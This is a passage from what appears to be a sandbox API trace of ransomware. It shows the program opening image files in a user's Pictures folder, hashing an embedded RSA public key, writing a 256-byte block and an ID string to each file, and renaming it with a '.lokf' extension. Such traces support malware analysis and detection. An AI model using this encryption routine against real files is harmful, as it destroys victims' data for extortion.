Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.029] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\f0kq4mu0SkEws8GQakO.gif") returned=".gif" [0060.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\f0kq4mu0SkEws8GQakO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\f0kq4mu0skews8gqako.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.029] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=78948) returned 1 [0060.029] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.031] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1343e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.031] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.032] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.032] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13464, lpOverlapped=0x0) returned 1 [0060.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.033] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.033] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.033] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.033] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.033] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.033] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.033] GetLastError () returned 0x0 [0060.034] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.034] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.034] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.034] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.034] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.034] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.035] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13464, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.035] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.035] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.035] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.035] CloseHandle (hObject=0x5cc) returned 1 [0060.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.036] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.036] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\f0kq4mu0SkEws8GQakO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\f0kq4mu0skews8gqako.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\f0kq4mu0SkEws8GQakO.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\f0kq4mu0skews8gqako.gif.lokf")) returned 1 [0060.037] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1551a9b0, ftCreationTime.dwHighDateTime=0x1d4cd78, ftLastAccessTime.dwLowDateTime=0xf833a320, ftLastAccessTime.dwHighDateTime=0x1d4d18b, ftLastWriteTime.dwLowDateTime=0xf833a320, ftLastWriteTime.dwHighDateTime=0x1d4d18b, nFileSizeHigh=0x0, nFileSizeLow=0x37ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="li369zaQPHRBOjAeQzQZ.png", cAlternateFileName="LI369Z~1.PNG")) returned 1 [0060.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.038] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\li369zaQPHRBOjAeQzQZ.png") returned=".png" [0060.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\li369zaQPHRBOjAeQzQZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\li369zaqphrbojaeqzqz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.038] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=14316) returned 1 [0060.038] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.040] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x37c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.040] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.041] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x37ec, lpOverlapped=0x0) returned 1 [0060.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.041] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.041] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.042] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.042] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.042] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.042] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.042] GetLastError () returned 0x0 [0060.042] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.042] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.042] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.042] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.042] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.042] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.043] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x37ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.043] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.043] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.043] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.043] CloseHandle (hObject=0x5cc) returned 1 [0060.044] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.044] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.044] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\li369zaQPHRBOjAeQzQZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\li369zaqphrbojaeqzqz.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\li369zaQPHRBOjAeQzQZ.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\li369zaqphrbojaeqzqz.png.lokf")) returned 1 [0060.045] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb735d2d0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0x850e5050, ftLastAccessTime.dwHighDateTime=0x1d4ca71, ftLastWriteTime.dwLowDateTime=0x850e5050, ftLastWriteTime.dwHighDateTime=0x1d4ca71, nFileSizeHigh=0x0, nFileSizeLow=0xe964, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MJFA.gif", cAlternateFileName="")) returned 1 [0060.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\MJFA.gif") returned=".gif" [0060.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\MJFA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\mjfa.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.045] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=59748) returned 1 [0060.045] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.047] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe93e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.048] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.048] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.048] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe964, lpOverlapped=0x0) returned 1 [0060.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.049] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.049] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.049] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.049] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.050] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.050] GetLastError () returned 0x0 [0060.050] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.050] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.050] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.050] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.050] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.050] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.051] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe964, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.051] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.051] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.051] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.051] CloseHandle (hObject=0x5cc) returned 1 [0060.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0060.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0060.052] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\MJFA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\mjfa.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\MJFA.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\mjfa.gif.lokf")) returned 1 [0060.053] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bdfe0, ftCreationTime.dwHighDateTime=0x1d4d176, ftLastAccessTime.dwLowDateTime=0x9fe27420, ftLastAccessTime.dwHighDateTime=0x1d4cc82, ftLastWriteTime.dwLowDateTime=0x9fe27420, ftLastWriteTime.dwHighDateTime=0x1d4cc82, nFileSizeHigh=0x0, nFileSizeLow=0xe1de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N3M3Ys.jpg", cAlternateFileName="")) returned 1 [0060.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.053] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\N3M3Ys.jpg") returned=".jpg" [0060.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\N3M3Ys.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\n3m3ys.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.053] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=57822) returned 1 [0060.053] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.056] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe1b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.056] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.056] 